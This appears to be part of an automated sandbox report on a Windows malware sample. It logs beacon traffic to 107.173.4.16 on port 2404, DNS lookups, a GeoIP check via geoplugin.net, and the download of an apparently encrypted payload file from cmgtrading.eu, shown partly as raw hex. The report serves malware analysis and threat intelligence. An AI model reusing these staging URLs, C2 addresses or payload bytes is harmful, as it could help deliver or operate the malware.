                                    Sep 25, 2024 16:01:32.837711096 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.837711096 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.837724924 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.837742090 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.837754011 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.837768078 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.837780952 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.837795019 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.837795019 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.837795019 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.837802887 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.837814093 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.837835073 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.837882996 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.837883949 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.838041067 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.838052988 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.838067055 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.838078976 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.838090897 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.838094950 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.838104963 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.838118076 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.838129044 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.838134050 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.838144064 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.838148117 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.838156939 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.838170052 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.838182926 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.838187933 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.838187933 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.838196039 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.838208914 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.838222980 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.838238001 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.838263988 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.838278055 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.838283062 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.838283062 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.838291883 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.838304996 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.838320971 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.838346004 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.838346004 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.838474035 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.923569918 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.923595905 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.923609972 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.923620939 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.923635006 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.923646927 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.923660994 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.923661947 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.923675060 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.923688889 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.923702002 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.923713923 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.923724890 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.923732042 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.923733950 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.923733950 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.923733950 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.923737049 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.923752069 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.923763990 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.923794031 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.923804045 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.923804045 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.923804045 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.923855066 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.923912048 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.923924923 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.923954010 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.923955917 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.923986912 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.924000978 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.924001932 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.924040079 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.924088955 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.924101114 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.924112082 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.924124956 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.924153090 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.924153090 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.924248934 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.924277067 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.924288988 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.924299955 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.924313068 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.924324989 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.924339056 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.924345970 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.924345970 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.924351931 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.924365044 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.924376011 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.924376965 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.924391985 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:32.924405098 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.924405098 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:32.924432993 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:33.078700066 CEST8064861178.237.33.50192.168.2.4
                                    Sep 25, 2024 16:01:33.078845978 CEST6486180192.168.2.4178.237.33.50
                                    Sep 25, 2024 16:01:35.449558973 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:35.456513882 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:35.456593990 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:35.456604958 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:35.456614971 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:35.456633091 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:35.456636906 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:35.456655025 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:35.456665993 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:35.456774950 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:35.457263947 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:35.457349062 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:35.457357883 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:35.461541891 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:35.461553097 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:35.461563110 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:35.461651087 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:35.461963892 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:35.461973906 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:35.461982965 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:35.525186062 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:35.530986071 CEST240464862107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:35.531052113 CEST648622404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:39.232626915 CEST240464860107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:01:39.237751007 CEST648602404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:01:39.242528915 CEST240464860107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:02:09.265113115 CEST240464860107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:02:09.267034054 CEST648602404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:02:09.274669886 CEST240464860107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:02:39.289917946 CEST240464860107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:02:39.291363001 CEST648602404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:02:39.296303988 CEST240464860107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:03:09.310900927 CEST240464860107.173.4.16192.168.2.4
                                    Sep 25, 2024 16:03:09.313390017 CEST648602404192.168.2.4107.173.4.16
                                    Sep 25, 2024 16:03:09.318295002 CEST240464860107.173.4.16192.168.2.4

                                    UDP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Sep 25, 2024 15:59:46.554647923 CEST5352255162.159.36.2192.168.2.4
                                    Sep 25, 2024 15:59:47.081538916 CEST53622131.1.1.1192.168.2.4
                                    Sep 25, 2024 16:01:27.144062996 CEST6464253192.168.2.41.1.1.1
                                    Sep 25, 2024 16:01:27.331731081 CEST53646421.1.1.1192.168.2.4
                                    Sep 25, 2024 16:01:31.459913015 CEST5225053192.168.2.41.1.1.1
                                    Sep 25, 2024 16:01:31.469832897 CEST53522501.1.1.1192.168.2.4

                                    DNS Queries

                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                    Sep 25, 2024 16:01:27.144062996 CEST192.168.2.41.1.1.10x853dStandard query (0)cmgtrading.euA (IP address)IN (0x0001)false
                                    Sep 25, 2024 16:01:31.459913015 CEST192.168.2.41.1.1.10xcdecStandard query (0)geoplugin.netA (IP address)IN (0x0001)false

                                    DNS Answers

                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                    Sep 25, 2024 16:01:27.331731081 CEST1.1.1.1192.168.2.40x853dNo error (0)cmgtrading.eu185.26.107.57A (IP address)IN (0x0001)false
                                    Sep 25, 2024 16:01:31.469832897 CEST1.1.1.1192.168.2.40xcdecNo error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false

                                    HTTP Request Dependency Graph

                                    • cmgtrading.eu
                                    • geoplugin.net

                                    HTTP Packets

                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.2.464858185.26.107.57801800C:\Users\user\AppData\Local\Temp\Conspect124.exe
                                    TimestampBytes transferredDirectionData
                                    Sep 25, 2024 16:01:27.344324112 CEST172OUTGET /eODGqfP132.bin HTTP/1.1
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                    Host: cmgtrading.eu
                                    Cache-Control: no-cache
                                    Sep 25, 2024 16:01:27.983258963 CEST391INHTTP/1.1 301 Moved Permanently
                                    server: nginx
                                    date: Wed, 25 Sep 2024 14:01:27 GMT
                                    content-type: text/html
                                    content-length: 162
                                    location: https://cmgtrading.eu/eODGqfP132.bin
                                    set-cookie: SERVID=B; path=/
                                    connection: close
                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    1192.168.2.464861178.237.33.50801800C:\Users\user\AppData\Local\Temp\Conspect124.exe
                                    TimestampBytes transferredDirectionData
                                    Sep 25, 2024 16:01:31.478108883 CEST71OUTGET /json.gp HTTP/1.1
                                    Host: geoplugin.net
                                    Cache-Control: no-cache
                                    Sep 25, 2024 16:01:32.079047918 CEST1170INHTTP/1.1 200 OK
                                    date: Wed, 25 Sep 2024 14:01:31 GMT
                                    server: Apache
                                    content-length: 962
                                    content-type: application/json; charset=utf-8
                                    cache-control: public, max-age=300
                                    access-control-allow-origin: *
                                    Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
                                    Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                    HTTPS Proxied Packets

                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.2.464859185.26.107.574431800C:\Users\user\AppData\Local\Temp\Conspect124.exe
                                    TimestampBytes transferredDirectionData
                                    2024-09-25 14:01:28 UTC214OUTGET /eODGqfP132.bin HTTP/1.1
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                    Cache-Control: no-cache
                                    Host: cmgtrading.eu
                                    Connection: Keep-Alive
                                    Cookie: SERVID=B
                                    2024-09-25 14:01:29 UTC318INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Wed, 25 Sep 2024 14:01:28 GMT
                                    Content-Type: application/octet-stream
                                    Content-Length: 494656
                                    Last-Modified: Wed, 25 Sep 2024 08:43:41 GMT
                                    Connection: close
                                    ETag: "66f3cd3d-78c40"
                                    Expires: Fri, 25 Oct 2024 14:01:28 GMT
                                    Cache-Control: max-age=2592000
                                    Accept-Ranges: bytes
                                    2024-09-25 14:01:29 UTC16066INData Raw: 02 75 e1 a1 66 75 35 8d 41 f3 38 57 8e 20 0e 52 e6 2e ca 7f 20 d9 a8 a9 0f e3 8e a2 97 5e f6 87 fc 3a cf 40 f6 89 54 a8 65 0b f4 dd 5f a3 d8 42 6f e5 a2 ad 17 47 ca d6 50 92 e1 85 a8 70 fd 4d 6c bc 41 d4 4e 7d 66 a3 9c c2 39 f7 39 e7 cc db 8d 66 f5 1d 6a d4 a6 e9 32 ec ed 1b 93 71 f6 e5 b5 c2 81 14 17 18 16 c6 af b6 d0 36 f9 40 14 bf b8 06 80 75 b9 8b bd c9 38 9a 4a 6d 87 a8 83 6e f2 92 33 7b d6 91 eb 56 b6 a6 14 b9 07 f1 18 49 0b 35 94 eb f9 c6 41 23 78 ea 3f 2e 2a 22 8a ae ec 01 50 98 ad 66 0f 08 f9 90 4c e9 00 ea c1 fd 79 97 4a f0 de f3 36 61 91 05 7c 79 4d 56 18 1c d5 f6 90 1e 68 0b f7 33 f3 a7 3f 1c 2b c7 43 a7 94 49 54 bd 6f c6 fc d0 fa 2a 8e 98 0d 6e 78 9f 19 6d 11 0d 2c 83 e7 15 ff 28 75 f9 ff 48 d1 17 c5 28 ab f7 8f 41 21 32 0f 14 60 ea 8b 5c a1
                                    Data Ascii: ufu5A8W R. ^:@Te_BoGPpMlAN}f99fj2q6@u8Jmn3{VI5A#x?.*"PfLyJ6a|yMVh3?+CITo*nxm,(uH(A!2`\
                                    2024-09-25 14:01:29 UTC16384INData Raw: 86 dc 98 72 6c ea bf 51 06 fd 0d a2 19 73 47 28 a3 75 0a f6 ef 47 f9 23 c4 ec bc 37 22 ae 03 f3 bb bc eb a1 3c 5e 67 cb 72 33 e4 dc 7d be 5f da 48 b8 d7 07 22 44 81 f8 3a be f1 70 c2 fe df 01 65 ab 0b fe 2b 69 e8 bf 8f 36 74 4d d8 39 8a 73 39 97 53 91 b8 b1 e0 fd a0 3a 50 47 ac 51 06 2c 95 17 f0 b7 5c da b9 21 a5 9d 93 41 30 64 ef 52 b3 78 c0 3a 42 73 8a eb 28 63 bf 34 cc f8 a7 89 40 f6 a7 6f c4 33 89 b5 a5 4a 95 4f f7 14 0c 64 34 97 1e 3d 39 9d 63 82 b9 3b 1d 66 e8 24 e7 fa a2 0d 6c 80 7c b7 ba e9 a2 f8 ae 6f c6 30 2e ba de 55 67 bd a9 ba 79 40 be 9c b9 24 0f 18 51 68 36 8c e7 b7 18 c1 03 00 1f 05 b9 23 72 1b ec 4e 1e bd c8 4b 9c c8 5a 36 eb 14 08 39 97 c4 10 2a d6 71 62 24 85 7d fa c2 75 59 36 60 5f 1e dd 6c bd 3f bc 8a b1 82 ba 1c 0d db 35 31 80 42 8a
                                    Data Ascii: rlQsG(uG#7"<^gr3}_H"D:pe+i6tM9s9S:PGQ,\!A0dRx:Bs(c4@o3JOd4=9c;f$l|o0.Ugy@$Qh6#rNKZ69*qb$}uY6`_l?51B
                                    2024-09-25 14:01:29 UTC16384INData Raw: 14 af 91 9c 86 af 75 53 7b 05 bf 99 f2 0c ee c3 e0 46 74 30 84 30 72 26 f9 60 56 0e 23 dc 65 ed e1 29 da 6f d6 af f6 3e 60 35 2f 7e e1 e9 0b 40 ff 02 a4 26 51 19 87 40 13 10 c7 01 9c 5b 74 b9 11 0c f8 e2 66 d9 f9 a2 f4 5c 8e d5 dd 14 ab 78 1e 01 8a 3c 59 6e ec de 79 4d 56 95 91 b1 72 d7 cc c8 a6 21 4d bb 3e 05 7a ee 98 ad 52 a4 9f 9b c3 a2 23 d5 2d ea b4 26 a3 c2 ff 62 b1 0d 78 30 73 7a 1a dd 73 33 0f 2f 0c 7a 02 ef ec 16 92 ba df 48 d6 9f b3 15 af 5d 02 d9 46 77 9f b4 25 fe 8b 0c 6f 7a e8 68 27 dc 4d f2 1b 6d 9a 27 3e 78 41 63 7f a1 44 2b cf 47 5b 2d b8 1e ff 72 bc 48 6b c6 84 1b c1 4e 9c 12 f8 ae a9 c9 69 50 76 ae c3 0d 6f 8f 90 5b de 6d be 9f 07 65 4c a8 68 3f a5 68 89 91 74 29 6b 7a 0c 90 f0 8f 59 d7 82 40 e8 3b c1 62 5e a4 a6 7c 1a 8d 15 a5 45 2f 00
                                    Data Ascii: uS{Ft00r&`V#e)o>`5/~@&Q@[tf\x<YnyMVr!M>zR#-&bx0szs3/zH]Fw%ozh'Mm'>xAcD+G[-rHkNiPvo[meLh?ht)kzY@;b^|E/
                                    2024-09-25 14:01:29 UTC16384INData Raw: 7d e0 77 89 72 40 37 b5 77 54 60 f6 42 e5 2d 01 f2 25 60 d3 4b 7b 1b 9e c4 e7 f9 4d dc 7c cd c7 26 96 65 68 ea fa 19 51 9a d9 36 dc ce 0f 82 ac 49 b6 d6 05 03 ea de 97 a6 81 82 3b a9 f3 5a 39 6f 7a 76 5a 89 ab d1 1f 3f 67 5e 75 23 25 a3 f8 85 1a 45 18 3a 93 16 fb da d6 44 38 45 b1 81 4f 1a 54 ed 5d 0c 18 05 0c c5 52 08 5e 6d c6 f9 76 4c 99 fa 9f 1b 1e 1e 1e a3 63 59 f0 cb 30 be 0b cc 0d 4a bc 0a 34 af 2f 76 c4 66 d7 ef a8 2c eb 1a bb 37 7d a7 68 60 b2 af 09 51 9d b4 64 57 68 a4 a4 15 de fb ac f2 df 58 5a c3 64 56 c0 99 5a a1 aa a5 cf 91 4d 3f 2b 63 a4 5f be 6e 9b 81 71 74 64 46 2e 4b f6 8d 3b 87 38 99 6c ab 91 ae 8c c3 ab fd c1 18 5b bc f8 23 0d 92 02 f8 d3 89 6b a4 b6 3b e2 31 cb da 6f ca 11 f3 de 86 e2 98 43 af d5 1a d6 b5 6f 47 79 91 9c a5 34 51 c0 4d
                                    Data Ascii: }wr@7wT`B-%`K{M|&ehQ6I;Z9ozvZ?g^u#%E:D8EOT]R^mvLcY0J4/vf,7}h`QdWhXZdVZM?+c_nqtdF.K;8l[#k;1oCoGy4QM
                                    2024-09-25 14:01:29 UTC16384INData Raw: 1f 2c c0 53 a0 e7 b5 9f 7c 9c 9d 75 1b f2 4a 82 75 71 3f 1b c1 13 fe 24 3a c6 8b 20 9d e3 2a 32 3c 3b 67 c4 9c 21 ef 4a b5 e6 61 c9 65 f8 03 a3 aa 8d 73 da fa 9e 69 6b 9a b2 f3 7e 9a 0b 49 a8 b1 12 6d 36 58 96 2e 37 a9 6a ea 80 57 0b 65 c5 53 48 4b ed a3 82 d8 ea 09 03 e0 dd 63 e7 ec 16 a9 40 bd 2f 3c 39 44 e0 76 16 a5 f0 23 7f 74 e7 7d a6 1b 44 89 82 9e e8 0f ed bd 48 b8 d9 a5 06 c1 bc 63 09 2b 35 ff 05 e8 d6 39 38 75 c0 c5 32 ba 60 df 85 ed 5a 52 a8 ff 3e 01 27 c3 0a 04 21 e5 d3 b7 32 3e 62 e9 e4 e4 fa 61 c5 95 57 c1 57 04 09 c5 52 b5 a4 00 cb fb bd f5 e9 82 0c 1d 59 a1 83 68 08 33 cb 3b db b2 d8 67 9a 69 b4 f6 86 e1 52 7b 2f 55 7d 31 6f 97 d5 63 e9 e7 15 cd 8a 3b f2 f4 eb 27 da e2 9e f2 cf 3b 8e 76 7c c8 03 9b a1 c6 c5 5e 27 f5 1a 21 77 c4 43 1e a7 d3
                                    Data Ascii: ,S|uJuq?$: *2<;g!Jaesik~Im6X.7jWeSHKc@/<9Dv#t}DHc+598u2`ZR>'!2>baWWRYh3;giR{/U}1oc;';v|^'!wC
                                    2024-09-25 14:01:29 UTC16384INData Raw: 2b f4 d1 93 d0 69 c4 b6 e4 ac 96 8f 34 ba 09 28 00 79 23 dc 56 79 6b df 96 fe d5 55 a9 44 ae ef a8 79 7f c1 23 31 20 17 fd 26 99 ae cf 11 ed 4e 73 e3 33 09 6b 26 35 08 1a 13 5c d0 8e da 01 1d d4 fb 2c 8b 97 56 6e a4 97 40 3c 5e d9 49 8f 03 f5 26 db 6b ff 8b 94 93 09 32 9d 3d 74 4d 00 10 51 ab 93 2b c7 38 a9 ab 83 b0 ba 32 09 d7 f2 37 9a ed 22 e8 72 b5 95 d9 70 41 ed 7b 74 3c b1 b9 5e 54 69 ee a7 03 ff 13 04 15 4a d6 9c 7d 70 8b 62 e7 0c 03 9c 17 72 99 04 71 3e f7 35 9b 56 9e 46 e5 c0 44 ac 73 cb ab 63 17 ed ea bd 27 79 26 32 a4 5c c3 8c 00 11 f9 62 83 c3 dd 73 6d 83 5b 96 f5 d1 80 1c 81 f6 18 da 71 1f 09 16 72 23 56 f1 1d 2f 3e 96 7e 1d 51 c2 63 1a db ca f9 c4 1a 8e cf 19 ad e8 56 02 69 a8 c3 18 73 3d 7e 37 19 b6 c8 f2 17 f4 64 c0 32 34 da 6d 07 74 8e 70
                                    Data Ascii: +i4(y#VykUDy#1 &Ns3k&5\,Vn@<^I&k2=tMQ+827"rpA{t<^TiJ}pbrq>5VFDsc'y&2\bsm[qr#V/>~QcVis=~7d24mtp
